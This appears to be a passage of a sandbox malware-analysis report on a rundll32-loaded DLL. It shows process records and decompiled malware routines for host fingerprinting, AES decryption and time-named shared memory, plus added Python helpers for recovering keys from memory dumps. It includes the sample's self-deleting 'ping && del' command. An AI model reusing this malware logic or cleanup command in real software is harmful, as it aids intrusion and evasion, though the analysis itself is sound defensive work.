                                          Start time:08:13:12
                                          Start date:23/04/2022
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\VoevdOQpeU.dll
                                          Imagebase:0x7ff7bb450000
                                          File size:273920 bytes
                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          Target ID:38
                                          Start time:08:13:12
                                          Start date:23/04/2022
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff647620000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language

                                          Target ID:39
                                          Start time:08:13:13
                                          Start date:23/04/2022
                                          Path:C:\Windows\System32\PING.EXE
                                          Wow64 process (32bit):false
                                          Commandline:ping localhost -n 5
                                          Imagebase:0x7ff69dae0000
                                          File size:21504 bytes
                                          MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language


                                            Execution Graph

                                            Execution Coverage:19.3%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:0%
                                            Total number of Nodes:6
                                            Total number of Limit Nodes:0

                                            Callgraph

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.297606650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                            Similarity
                                            • API ID: BinaryType
                                            • String ID:
                                            • API String ID: 3726996659-0
                                            • Opcode ID: 0d8183f7bc2a03e09b861609ac5344eb6a7f23cfc13e173dd0e82fd06fead202
                                            • Instruction ID: 0eeef9b5ff0b6f189b2643ab8443012d5bbcf05fbf81118edcc849a7d612c21c
                                            • Opcode Fuzzy Hash: 0d8183f7bc2a03e09b861609ac5344eb6a7f23cfc13e173dd0e82fd06fead202
                                            • Instruction Fuzzy Hash: 5F310AB4D043188BDB24DF64C8847ADBBB0AF55304F6081FAD819672E1D3799AC6DB4A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            C-Code - Quality: 37%
                                            			E00401700() {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr* _t7;
                                            				intOrPtr _t9;
                                            				intOrPtr* _t13;
                                            
                                            				_t7 = _t13;
                                            				 *((intOrPtr*)(_t7 + 8)) = 0;
                                            				 *((intOrPtr*)(_t7 + 4)) = 0;
                                            				 *_t7 = 0;
                                            				_t9 =  *__imp__GetNLSVersion(); // executed
                                            				_v12 = _t9;
                                            				if(GetLastError() != 0x57) {
                                            					_v8 = 1;
                                            				} else {
                                            					_v8 = 0;
                                            				}
                                            				return _v8;
                                            			}


                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.297606650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_loaddll32.jbxd
                                            Similarity
                                            • API ID: Version
                                            • String ID:
                                            • API String ID: 1889659487-0
                                            • Opcode ID: 0da74c04d799af1ca03a9938062762a246fb5c330307c100066ee08efe424fb3
                                            • Instruction ID: 3cf9f2388d101d325097f471fc7551e32da9b99bb7f36ef05aa09be99d1535a1
                                            • Opcode Fuzzy Hash: 0da74c04d799af1ca03a9938062762a246fb5c330307c100066ee08efe424fb3
                                            • Instruction Fuzzy Hash: 14E04FB0914204DFDB00EFA8D95975E7BF0AB00308F1580F9D8085B3A1D379DE54EB9A
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            APIs
                                            • RtlInitializeCriticalSection.NTDLL(05829448), ref: 0581314C
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • memset.NTDLL ref: 0581317D
                                            • RtlInitializeCriticalSection.NTDLL(05D7C2D0), ref: 0581318E
                                              • Part of subcall function 05811777: RtlInitializeCriticalSection.NTDLL(05829420), ref: 0581179B
                                              • Part of subcall function 05811777: RtlInitializeCriticalSection.NTDLL(05829400), ref: 058117B1
                                              • Part of subcall function 05811777: GetVersion.KERNEL32(?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 058117C2
                                              • Part of subcall function 05811777: GetModuleHandleA.KERNEL32(00001663,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 058117F6
                                              • Part of subcall function 058135F7: RtlAllocateHeap.NTDLL(00000000,-00000003,773D9EB0), ref: 05813611
                                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000060,?,?,?,?,?,?,?,0580BF69,?), ref: 058131B7
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 058131C8
                                            • CloseHandle.KERNEL32(000005A8,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 058131DC
                                            • GetUserNameA.ADVAPI32(00000000,?), ref: 05813225
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 05813238
                                            • GetUserNameA.ADVAPI32(00000000,?), ref: 0581324D
                                            • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 0581327D
                                            • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 05813292
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 0581329C
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 058132A9
                                            • GetShellWindow.USER32 ref: 058132C4
                                            • GetWindowThreadProcessId.USER32(00000000), ref: 058132CB
                                            • memcpy.NTDLL(05829314,?,00000018,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 05813307
                                            • CreateEventA.KERNEL32(05829208,00000001,00000000,00000000,?,00000001,?,?,?,?,?,?,?,0580BF69,?), ref: 05813385
                                            • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 058133AF
                                            • OpenEventA.KERNEL32(00100000,00000000,05D7B9C8,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 058133D7
                                            • CreateEventA.KERNEL32(05829208,00000001,00000000,05D7B9C8,?,?,?,?,?,?,?,0580BF69,?), ref: 058133EC
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 058133F2
                                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 0581348A
                                            • SetEvent.KERNEL32(?,05819CDB,00000000,00000000,?,?,?,?,?,?,?,0580BF69,?), ref: 05813520
                                            • RtlAllocateHeap.NTDLL(00000000,00000043,05819CDB), ref: 05813535
                                            • wsprintfA.USER32 ref: 05813565
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                                            • String ID:
                                            • API String ID: 3929413950-0
                                            • Opcode ID: c3a5c66595dd53de8f72586ee3e0ccb3f02de9ef610a41b254cb8e4fb95c57a0
                                            • Instruction ID: 0e29771809117c22ab6ac9fa2218162668954372aee7d3d2d86fff81728c93ea
                                            • Opcode Fuzzy Hash: c3a5c66595dd53de8f72586ee3e0ccb3f02de9ef610a41b254cb8e4fb95c57a0
                                            • Instruction Fuzzy Hash: 9AC16CB06143589FDB20AF66E84A96A7FEDFB84601F018C1DFD46C7250CF35A884CB66
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            C-Code - Quality: 58%
                                            			E049F3072(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                            				int _v8;
                                            				long* _v12;
                                            				int _v16;
                                            				BYTE* _v20;
                                            				long* _v24;
                                            				void* _v39;
                                            				char _v40;
                                            				void _v56;
                                            				int _v60;
                                            				intOrPtr _v64;
                                            				void _v67;
                                            				char _v68;
                                            				void* _t61;
                                            				int _t68;
                                            				signed int _t76;
                                            				int _t79;
                                            				int _t81;
                                            				int _t85;
                                            				long _t86;
                                            				int _t90;
                                            				signed int _t94;
                                            				int _t101;
                                            				BYTE* _t102;
                                            				int _t103;
                                            				void* _t104;
                                            				void* _t105;
                                            				void* _t106;
                                            
                                            				_t103 = __eax;
                                            				_t94 = 6;
                                            				_v68 = 0;
                                            				memset( &_v67, 0, _t94 << 2);
                                            				_t105 = _t104 + 0xc;
                                            				asm("stosw");
                                            				asm("stosb");
                                            				_v40 = 0;
                                            				asm("stosd");
                                            				asm("stosd");
                                            				asm("stosd");
                                            				asm("stosw");
                                            				asm("stosb");
                                            				_t61 =  *0x49fa0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                                            				if(_t61 == 0) {
                                            					_a8 = GetLastError();
                                            				} else {
                                            					_t101 = 0x10;
                                            					memcpy( &_v56, _a8, _t101);
                                            					_t106 = _t105 + 0xc;
                                            					_v60 = _t101;
                                            					_v67 = 2;
                                            					_v64 = 0x660e;
                                            					_v68 = 8;
                                            					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                                            					if(_t68 == 0) {
                                            						_a8 = GetLastError();
                                            					} else {
                                            						_push(0);
                                            						_push( &_v40);
                                            						_push(1);
                                            						_push(_v12);
                                            						if( *0x49fa0e4() == 0) {
                                            							_a8 = GetLastError();
                                            						} else {
                                            							_t18 = _t103 + 0xf; // 0x11f
                                            							_t76 = _t18 & 0xfffffff0;
                                            							if(_a4 != 0 && _t76 == _t103) {
                                            								_t76 = _t76 + _t101;
                                            							}
                                            							_t102 = E049F4DF6(_t76);
                                            							_v20 = _t102;
                                            							if(_t102 == 0) {
                                            								_a8 = 8;
                                            							} else {
                                            								_v16 = 0;
                                            								_a8 = 0;
                                            								while(1) {
                                            									_t79 = 0x10;
                                            									_v8 = _t79;
                                            									if(_t103 <= _t79) {
                                            										_v8 = _t103;
                                            									}
                                            									memcpy(_t102, _a12, _v8);
                                            									_t81 = _v8;
                                            									_a12 = _a12 + _t81;
                                            									_t103 = _t103 - _t81;
                                            									_t106 = _t106 + 0xc;
                                            									if(_a4 == 0) {
                                            										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                                            									} else {
                                            										_t85 =  *0x49fa0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                                            									}
                                            									if(_t85 == 0) {
                                            										break;
                                            									}
                                            									_t90 = _v8;
                                            									_v16 = _v16 + _t90;
                                            									_t102 =  &(_t102[_t90]);
                                            									if(_t103 != 0) {
                                            										continue;
                                            									} else {
                                            										L17:
                                            										 *_a16 = _v20;
                                            										 *_a20 = _v16;
                                            									}
                                            									goto L21;
                                            								}
                                            								_t86 = GetLastError();
                                            								_a8 = _t86;
                                            								if(_t86 != 0) {
                                            									E049F4C73(_v20);
                                            								} else {
                                            									goto L17;
                                            								}
                                            							}
                                            						}
                                            						L21:
                                            						CryptDestroyKey(_v12);
                                            					}
                                            					CryptReleaseContext(_v24, 0);
                                            				}
                                            				return _a8;
                                            			}


                                            APIs
                                            • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,049F58B7), ref: 049F30AA
                                            • memcpy.NTDLL(?,049F58B7,00000010,?,?,?,?,?,?,?,?,?,?,049F564C,00000000,049F6D90), ref: 049F30C3
                                            • CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 049F30EC
                                            • CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 049F3104
                                            • memcpy.NTDLL(00000000,049F6D90,049F58B7,0000011F), ref: 049F3156
                                            • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,049F58B7,00000020,?,?,0000011F), ref: 049F317F
                                            • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,049F58B7,?,?,0000011F), ref: 049F3196
                                            • GetLastError.KERNEL32(?,?,0000011F), ref: 049F31AE
                                            • GetLastError.KERNEL32 ref: 049F31E0
                                            • CryptDestroyKey.ADVAPI32(?), ref: 049F31EC
                                            • GetLastError.KERNEL32 ref: 049F31F4
                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 049F3201
                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,049F564C,00000000,049F6D90,049F58B7,?,049F58B7), ref: 049F3209
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                             • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                                            • String ID:
                                            • API String ID: 1967744295-0
                                            • Opcode ID: ca002147fcf6af93da689b2d0ca69bfb717ff82b37d1b12bbc9c08bdb7568976
                                            • Instruction ID: 3e7c00129f23927e46cd2bc1dd730073eaba33bd70cd8195b3c23a85852be2ca
                                            • Opcode Fuzzy Hash: ca002147fcf6af93da689b2d0ca69bfb717ff82b37d1b12bbc9c08bdb7568976
                                            • Instruction Fuzzy Hash: 66513BB1A00209FFDB209FA5DC84EEE7BB9EB44354F044435FA15E6240D779AE54DB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%
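
The API sequence listed for this function (CryptAcquireContextW with dwProvType 0x18 and dwFlags 0xF0000000, a 0x10-byte memcpy, CryptImportKey on a 0x1C-byte blob, CryptSetKeyParam with dwParam 1, then CryptEncrypt and CryptDecrypt) is the CryptoAPI pattern for importing a raw symmetric key and giving it an IV: 0x18 is PROV_RSA_AES, 0xF0000000 is CRYPT_VERIFYCONTEXT, dwParam 1 is KP_IV, and 0x1C bytes is exactly an 8-byte BLOBHEADER, a 4-byte key length and a 16-byte key, i.e. a PLAINTEXTKEYBLOB carrying a 128-bit key; the 16-byte memcpy at 049F30C3 is consistent with the key being copied into that blob. The Python below is an added example and not code from the report or from the sample: it builds and parses that blob layout and scans a buffer for plaintext AES key blobs, which is how such a key can be recovered from a memory dump like the .sdmp files listed above. The algorithm identifier is an assumption, since the report does not show the header bytes of the imported blob, and the buffer scanned in the example is constructed.

```python
import struct

# CryptoAPI constants from wincrypt.h (documented values, not taken from the report).
PLAINTEXTKEYBLOB = 0x8
CUR_BLOB_VERSION = 0x2
CALG_AES_128, CALG_AES_192, CALG_AES_256 = 0x660E, 0x660F, 0x6610
PROV_RSA_AES = 0x18            # dwProvType passed to CryptAcquireContextW in the listing above
CRYPT_VERIFYCONTEXT = 0xF0000000
KP_IV = 1                      # dwParam passed to CryptSetKeyParam in the listing above
BLOB_HEADER_LEN = 12           # BLOBHEADER (8 bytes) + DWORD key length
KEY_LEN_BY_ALG = {CALG_AES_128: 16, CALG_AES_192: 24, CALG_AES_256: 32}


def build_plaintext_key_blob(key: bytes, alg_id: int = CALG_AES_128) -> bytes:
    """Builds the PLAINTEXTKEYBLOB that CryptImportKey accepts for a raw symmetric key."""
    if len(key) != KEY_LEN_BY_ALG[alg_id]:
        raise ValueError("key length does not match the algorithm")
    header = struct.pack("<BBHI", PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, alg_id)
    return header + struct.pack("<I", len(key)) + key


def parse_plaintext_key_blob(blob: bytes) -> dict:
    """Validates a blob's layout and returns its algorithm ID and raw key."""
    if len(blob) < BLOB_HEADER_LEN:
        raise ValueError("blob shorter than BLOBHEADER + key length")
    btype, bversion, reserved, alg_id = struct.unpack_from("<BBHI", blob, 0)
    (key_len,) = struct.unpack_from("<I", blob, 8)
    if btype != PLAINTEXTKEYBLOB:
        raise ValueError(f"not a PLAINTEXTKEYBLOB (bType={btype:#x})")
    if bversion != CUR_BLOB_VERSION or reserved != 0:
        raise ValueError("unexpected BLOBHEADER version or reserved field")
    if len(blob) != BLOB_HEADER_LEN + key_len:
        raise ValueError(f"blob length {len(blob)} does not match declared key length {key_len}")
    return {"alg_id": alg_id, "key": blob[BLOB_HEADER_LEN:]}


def scan_for_aes_key_blobs(data: bytes) -> list:
    """Finds every plaintext AES key blob in a memory buffer; returns (offset, alg_id, key) tuples."""
    hits = []
    for alg_id, key_len in KEY_LEN_BY_ALG.items():
        # Header + declared key length is a fixed 12-byte signature per algorithm.
        needle = struct.pack("<BBHII", PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, alg_id, key_len)
        pos = data.find(needle)
        while pos >= 0:
            end = pos + BLOB_HEADER_LEN + key_len
            if end <= len(data):
                hits.append((pos, alg_id, data[pos + BLOB_HEADER_LEN:end]))
            pos = data.find(needle, pos + 1)
    return sorted(hits)


if __name__ == "__main__":
    # Constructed sample: a made-up 16-byte key embedded in filler, as it might sit in a dumped heap.
    sample_key = bytes(range(16))
    dump = b"\xAA" * 4 + build_plaintext_key_blob(sample_key) + b"\x00" * 8
    for off, alg, key in scan_for_aes_key_blobs(dump):
        print(f"offset {off:#x}: alg {alg:#x}, key {key.hex()}")
```

Running the scanner over the 049F0000-based dumps listed above would only be meaningful if the key blob is still resident at the time of the dump; the 28-byte length check in parse_plaintext_key_blob is the same constraint the CryptImportKey call above imposes.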

                                            Control-flow Graph

                                            C-Code - Quality: 74%
                                             			E049F5410(intOrPtr __edx, void** _a4, void** _a8) {
                                             				intOrPtr _v8;                /* high DWORD of the FILETIME, later of the quotient */
                                             				struct _FILETIME* _v12;      /* low DWORD of the FILETIME (the decompiler types it as a pointer) */
                                             				short _v56;                  /* 22-wchar buffer that receives the object name */
                                             				struct _FILETIME* _t12;
                                             				intOrPtr _t13;
                                             				void* _t17;
                                             				void* _t21;
                                             				intOrPtr _t27;
                                             				long _t28;
                                             				void* _t30;
                                             
                                             				_t27 = __edx;
                                             				_t12 =  &_v12;
                                             				GetSystemTimeAsFileTime(_t12);                 /* current time as 100-ns ticks since 1601 */
                                             				_push(0x192);                                  /* divisor high DWORD: 0x192:54d38000 = 1,728,000,000,000 ticks = 48 hours */
                                             				_push(0x54d38000);                             /* divisor low DWORD */
                                             				_push(_v8);
                                             				_push(_v12);
                                             				L049F81C4();                                   /* _aulldiv (see APIs): FILETIME / 48h, a bucket value that changes every two days */
                                             				_push(_t12);                                   /* quotient (eax) becomes the _snwprintf argument */
                                             				_v12 = _t12;
                                             				_t13 =  *0x49fa348; // 0x57d5a8
                                             				_t5 = _t13 + 0x49fb87e; // 0x4f78e26            /* string references; the format string itself is not recovered on this page */
                                             				_t6 = _t13 + 0x49fb59c; // 0x530025
                                             				_push(0x16);                                   /* 22 = size of _v56 in wide characters */
                                             				_push( &_v56);
                                             				_v8 = _t27;                                    /* edx after the division (the decompiler shows the entry value of edx) */
                                             				L049F7E2A();                                   /* _snwprintf (see APIs): renders the bucket value into the name in _v56 */
                                             				_t17 = CreateFileMappingW(0xffffffff, 0x49fa34c, 4, 0, 0x1000,  &_v56); // executed
                                             				/* INVALID_HANDLE_VALUE: pagefile-backed section, PAGE_READWRITE (4), 0x1000 bytes, named by _v56;
                                             				   0x49fa34c points at a SECURITY_ATTRIBUTES structure in the module's data */
                                             				_t30 = _t17;
                                             				if(_t30 == 0) {
                                             					_t28 = GetLastError();
                                             				} else {
                                             					if(GetLastError() == 0xb7) {               /* 0xb7 = ERROR_ALREADY_EXISTS: only a section created earlier is accepted */
                                             						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed   /* 6 = FILE_MAP_READ | FILE_MAP_WRITE, whole section */
                                             						if(_t21 == 0) {
                                             							_t28 = GetLastError();
                                             							if(_t28 != 0) {
                                             								goto L6;
                                             							}
                                             						} else {
                                             							 *_a4 = _t30;                       /* section handle and view base are returned to the caller */
                                             							 *_a8 = _t21;
                                             							_t28 = 0;
                                             						}
                                             					} else {
                                             						_t28 = 2;                              /* a freshly created section is closed again and 2 (ERROR_FILE_NOT_FOUND) returned */
                                             						L6:
                                             						CloseHandle(_t30);
                                             					}
                                             				}
                                             				return _t28;
                                             			}

                                            APIs
                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,049F2CE0,?,?,4D283A53,?,?), ref: 049F541C
                                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 049F5432
                                            • _snwprintf.NTDLL ref: 049F5457
                                            • CreateFileMappingW.KERNELBASE(000000FF,049FA34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 049F5473
                                            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,049F2CE0,?,?,4D283A53,?), ref: 049F5485
                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 049F549C
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,049F2CE0,?,?,4D283A53), ref: 049F54BD
                                            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,049F2CE0,?,?,4D283A53,?), ref: 049F54C5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                             • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                            • String ID:
                                            • API String ID: 1814172918-0
                                            • Opcode ID: 33f140fd82fe1b51d7d099aaffa5811756f5a3b55ae41b61003700700ab2ac20
                                            • Instruction ID: ea1d133f5a03c24a2bff079636c203a7ed029eac300f5de744de9a4ccfcf6047
                                            • Opcode Fuzzy Hash: 33f140fd82fe1b51d7d099aaffa5811756f5a3b55ae41b61003700700ab2ac20
                                            • Instruction Fuzzy Hash: 9321A2B2601214BBD711EF68DC09F9E7BB9EB84711F254031FA09EB291E674A904CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%
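
The _aulldiv call in E049F5410 divides the FILETIME by the 64-bit constant pushed as 0x192:0x54d38000, which is 1,728,000,000,000 ticks of 100 ns, i.e. exactly 48 hours. The value handed to _snwprintf is therefore a counter that increments every two days, and the mapping name derived from it stays constant within that window, which matters when you want to predict or match the object name across runs. The Python below is an added example and not code from the report or from the sample: it reproduces the division as the two-DWORD _aulldiv call, computes the bucket for a UTC timestamp and maps a bucket back to its 48-hour window. The format string passed to _snwprintf is not recovered on this page, so the example stops at the numeric value and does not construct the object name.

```python
from datetime import datetime, timedelta, timezone

# Divisor as pushed before the _aulldiv call: high DWORD 0x192, low DWORD 0x54d38000.
DIVISOR_HIGH, DIVISOR_LOW = 0x192, 0x54D38000
BUCKET_DIVISOR = (DIVISOR_HIGH << 32) | DIVISOR_LOW     # 1_728_000_000_000 ticks of 100 ns
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
TICKS_PER_SECOND = 10_000_000


def aulldiv(low: int, high: int, div_low: int, div_high: int) -> tuple:
    """Mirrors the CRT _aulldiv: unsigned 64-bit division of two DWORD pairs, quotient as (low, high)."""
    dividend = (high << 32) | low
    divisor = (div_high << 32) | div_low
    q = dividend // divisor
    return q & 0xFFFFFFFF, q >> 32


def bucket_seconds() -> int:
    """Length of one bucket in seconds: the divisor converted from 100-ns ticks."""
    return BUCKET_DIVISOR // TICKS_PER_SECOND


def filetime_from_utc(iso: str) -> int:
    """Converts an ISO-8601 timestamp, interpreted as UTC, to a FILETIME (100-ns ticks since 1601-01-01)."""
    dt = datetime.fromisoformat(iso).replace(tzinfo=timezone.utc)
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


def time_bucket(iso: str) -> int:
    """The value E049F5410 hands to _snwprintf for the given UTC time."""
    ft = filetime_from_utc(iso)
    q_low, q_high = aulldiv(ft & 0xFFFFFFFF, ft >> 32, DIVISOR_LOW, DIVISOR_HIGH)
    return (q_high << 32) | q_low


def bucket_window(bucket: int) -> tuple:
    """UTC start (inclusive) and end (exclusive) of the window in which the bucket value is constant."""
    start = FILETIME_EPOCH + timedelta(microseconds=bucket * BUCKET_DIVISOR // 10)
    end = start + timedelta(microseconds=BUCKET_DIVISOR // 10)
    return start.isoformat(), end.isoformat()


if __name__ == "__main__":
    now = datetime.now(timezone.utc).replace(tzinfo=None).isoformat(timespec="seconds")
    b = time_bucket(now)
    print(f"bucket {b} covers {bucket_window(b)[0]} .. {bucket_window(b)[1]}")
```

Note that the bucket boundaries fall on even days counted from 1601-01-01 rather than on calendar days, so a sample run on consecutive days can produce either the same or a different name depending on where the 48-hour boundary falls.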

                                            Control-flow Graph

                                             Basic blocks (address range, calls made in the block, successors):
                                             • 396: 49f12d3-49f12e7 -> 397, 398
                                             • 397: 49f12e9-49f12ee -> 398
                                             • 398: 49f12f1-49f1303 (call 49f333b) -> 401, 402
                                             • 401: 49f1357-49f1364 -> 403
                                             • 402: 49f1305-49f1315 (GetUserNameW) -> 403, 404
                                             • 403: 49f1366-49f137d (GetComputerNameW) -> 405, 406
                                             • 404: 49f1317-49f1327 (RtlAllocateHeap) -> 403, 407
                                             • 405: 49f137f-49f1390 (RtlAllocateHeap) -> 406, 408
                                             • 406: 49f13bb-49f13df -> (exit)
                                             • 407: 49f1329-49f1336 (GetUserNameW) -> 409, 410
                                             • 408: 49f1392-49f139b (GetComputerNameW) -> 411, 412
                                             • 409: 49f1338-49f1344 (call 49f2087) -> 410
                                             • 410: 49f1346-49f1355 (HeapFree) -> 403
                                             • 411: 49f139d-49f13a9 (call 49f2087) -> 412
                                             • 412: 49f13ac-49f13b5 (HeapFree) -> 406
                                            C-Code - Quality: 96%
                                             			E049F12D3(char __eax, void* __esi) {
                                             				long _v8;                 /* character count returned by GetUserNameW / GetComputerNameW */
                                             				char _v12;                /* seed passed to E049F333B */
                                             				signed int _v16;          /* cpuid edx */
                                             				signed int _v20;          /* cpuid ecx */
                                             				signed int _v28;          /* cpuid eax (_v24, which is never read back, holds ebx) */
                                             				long _t34;
                                             				signed int _t39;
                                             				long _t50;
                                             				char _t59;
                                             				intOrPtr _t61;
                                             				void* _t62;
                                             				void* _t64;
                                             				char _t65;
                                             				intOrPtr* _t67;
                                             				void* _t68;
                                             				void* _t69;
                                             
                                             				_t69 = __esi;             /* esi -> output structure; this routine XORs into its fields at +0, +4 and +0xc */
                                             				_t65 = __eax;
                                             				_v8 = 0;
                                             				_v12 = __eax;
                                             				if(__eax == 0) {
                                             					_t59 =  *0x49fa310; // 0xd448b889   /* default seed when the caller passes 0 */
                                             					_v12 = _t59;
                                             				}
                                             				_t64 = _t69;
                                             				E049F333B( &_v12, _t64);  /* not shown on this page; receives the seed and the output structure */
                                             				if(_t65 != 0) {
                                             					 *_t69 =  *_t69 ^  *0x49fa344 ^ 0x46d76429;   /* caller-supplied seed: mix a global and a constant into +0 */
                                             				} else {
                                             					GetUserNameW(0,  &_v8); // executed          /* size query: _v8 receives the required character count */
                                             					_t50 = _v8;
                                             					if(_t50 != 0) {
                                             						_t62 = RtlAllocateHeap( *0x49fa2d8, 0, _t50 + _t50);   /* two bytes per wide character */
                                             						if(_t62 != 0) {
                                             							if(GetUserNameW(_t62,  &_v8) != 0) {
                                             								_t64 = _t62;
                                             								 *_t69 =  *_t69 ^ E049F2087(_v8 + _v8, _t64);   /* E049F2087 (not shown here) hashes the user name; result XORed into +0 */
                                             							}
                                             							HeapFree( *0x49fa2d8, 0, _t62);
                                             						}
                                             					}
                                             				}
                                             				_t61 = __imp__;           /* decompiler artifact: the register later stored as the cpuid ebx value */
                                             				_v8 = _v8 & 0x00000000;   /* _v8 = 0 */
                                             				GetComputerNameW(0,  &_v8);                       /* same size-query / allocate / query pattern for the computer name */
                                             				_t34 = _v8;
                                             				if(_t34 != 0) {
                                             					_t68 = RtlAllocateHeap( *0x49fa2d8, 0, _t34 + _t34);
                                             					if(_t68 != 0) {
                                             						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                             							_t64 = _t68;
                                             							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E049F2087(_v8 + _v8, _t64);   /* computer-name hash XORed into +0xc */
                                             						}
                                             						HeapFree( *0x49fa2d8, 0, _t68);
                                             					}
                                             				}
